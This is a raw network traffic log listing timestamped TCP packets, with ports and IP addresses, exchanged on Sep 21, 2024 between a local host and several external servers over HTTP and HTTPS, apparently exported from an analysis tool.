Sep 21, 2024 14:48:09.443577051 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.443587065 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.443661928 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.443686008 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.443686008 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.443752050 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.448297977 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.448308945 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.448430061 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.455365896 CEST	80	49720	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.455476046 CEST	49720	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.455496073 CEST	80	49720	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.455554962 CEST	49720	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.455898046 CEST	49720	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.456389904 CEST	49721	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.460740089 CEST	80	49720	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.460949898 CEST	80	49719	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.461018085 CEST	49719	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.461070061 CEST	80	49719	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.461116076 CEST	49719	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.461194992 CEST	80	49721	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.461287022 CEST	49719	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.461330891 CEST	49721	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.461575985 CEST	49721	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.461601019 CEST	49722	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.466048956 CEST	80	49719	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.466384888 CEST	80	49721	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.466397047 CEST	80	49722	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.466551065 CEST	49722	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.466711044 CEST	49722	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.466955900 CEST	49723	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.471707106 CEST	80	49722	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.471718073 CEST	80	49723	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.471815109 CEST	49723	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.471867085 CEST	49722	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.472172022 CEST	49723	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.476897001 CEST	80	49723	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.477224112 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.477308035 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.477317095 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.477319002 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.477355957 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.477356911 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.477385044 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.477404118 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.477463007 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.477509022 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.477533102 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.477544069 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.477577925 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.477598906 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.477600098 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.477611065 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.477623940 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.477647066 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.477668047 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.477679014 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.477690935 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.477727890 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.477775097 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.477785110 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.477828979 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.477859974 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.477870941 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.477900982 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.477930069 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.477935076 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.477945089 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.477956057 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.477988005 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.478018045 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.478028059 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478039026 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478049994 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478076935 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.478094101 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.478161097 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478172064 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478180885 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478209972 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.478233099 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.478316069 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478327990 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478338957 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478351116 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478362083 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478370905 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.478405952 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.478425980 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478467941 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478468895 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.478543043 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.478550911 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478559971 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478570938 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478581905 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478605032 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.478637934 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.478749037 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478760004 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478770971 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478781939 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478792906 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478802919 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.478804111 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478816032 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478827953 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.478832960 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.478852987 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.478873968 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.479069948 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479080915 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479091883 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479095936 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479106903 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479116917 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479125977 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479126930 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.479136944 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479149103 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479156017 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.479160070 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479183912 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.479203939 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.479396105 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479408026 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479417086 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479428053 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479444981 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479451895 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.479456902 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479491949 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.479511976 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.479528904 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479540110 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479583979 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.479724884 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479737997 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479757071 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479767084 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479778051 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479782104 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.479789972 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479799986 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479809046 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.479813099 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479824066 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479834080 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479835987 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.479846954 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479852915 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479857922 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479867935 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.479868889 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479881048 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479892015 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479901075 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.479903936 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479916096 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479928017 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.479937077 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.479959965 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.479980946 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.480534077 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.480545044 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.480555058 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.480566025 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.480576992 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.480587959 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.480595112 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.480600119 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.480612040 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.480622053 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.480632067 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.480632067 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.480643988 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.480654955 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.480657101 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.480667114 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.480678082 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.480679989 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.480712891 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.480740070 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.480932951 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.480943918 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.480983019 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.481101036 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.481112957 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.481137037 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.481148005 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.481149912 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.481158972 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.481172085 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.481179953 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.481183052 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.481194973 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.481205940 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.481215954 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.481219053 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.481226921 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.481237888 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.481240988 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.481249094 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.481260061 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.481261969 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.481271029 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.481282949 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.481287003 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.481293917 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.481306076 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.481317997 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.481317997 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.481348991 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.481369019 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.496841908 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.496853113 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.496988058 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.522742987 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.522756100 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.522768021 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.522839069 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.522850990 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.522871971 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.522881985 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.522923946 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.522923946 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.523376942 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.523432016 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.523447037 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.523494005 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.523756027 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.523766994 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.523777008 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.523808002 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.523843050 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.523854017 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.523865938 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.523896933 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.523916006 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.524548054 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.524609089 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.524611950 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.524622917 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.524655104 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.524702072 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.524713039 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.524754047 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.525405884 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.525456905 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.525468111 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.525485039 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.525506020 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.525521994 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.525547981 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.537723064 CEST	80	49717	185.166.143.48	192.168.2.9
Sep 21, 2024 14:48:09.537828922 CEST	49717	80	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:09.538270950 CEST	49717	80	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:09.538717031 CEST	49724	80	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:09.543246984 CEST	80	49717	185.166.143.48	192.168.2.9
Sep 21, 2024 14:48:09.543323994 CEST	49717	80	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:09.543508053 CEST	80	49724	185.166.143.48	192.168.2.9
Sep 21, 2024 14:48:09.543581009 CEST	49724	80	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:09.543668985 CEST	49724	80	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:09.544502974 CEST	49725	443	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:09.544545889 CEST	443	49725	185.166.143.48	192.168.2.9
Sep 21, 2024 14:48:09.544612885 CEST	49725	443	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:09.544869900 CEST	49725	443	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:09.544882059 CEST	443	49725	185.166.143.48	192.168.2.9
Sep 21, 2024 14:48:09.548700094 CEST	80	49724	185.166.143.48	192.168.2.9
Sep 21, 2024 14:48:09.548773050 CEST	49724	80	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:09.559581995 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.559596062 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.559756994 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.559761047 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.559788942 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.559799910 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.559813023 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.559865952 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.559880972 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.559881926 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.559947968 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.559971094 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.560034037 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.560362101 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.560425997 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.560457945 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.560583115 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.560619116 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.560688019 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.560703993 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.560719013 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.560810089 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.560810089 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.560834885 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.560847998 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.560859919 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.560914040 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.560930014 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.561548948 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.561603069 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.561614990 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.561634064 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.561657906 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.561748028 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.561759949 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.561769009 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.561804056 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.561826944 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.562448025 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.562577963 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.568197966 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.568229914 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.568243027 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.568283081 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.568316936 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.568335056 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.568346977 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.568356991 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.568378925 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.568414927 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.568497896 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.568510056 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.568521023 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.568531990 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.568547964 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.568563938 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.568587065 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.568595886 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.568641901 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.568677902 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.568690062 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.568700075 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.568712950 CEST	80	49712	103.130.147.211	192.168.2.9
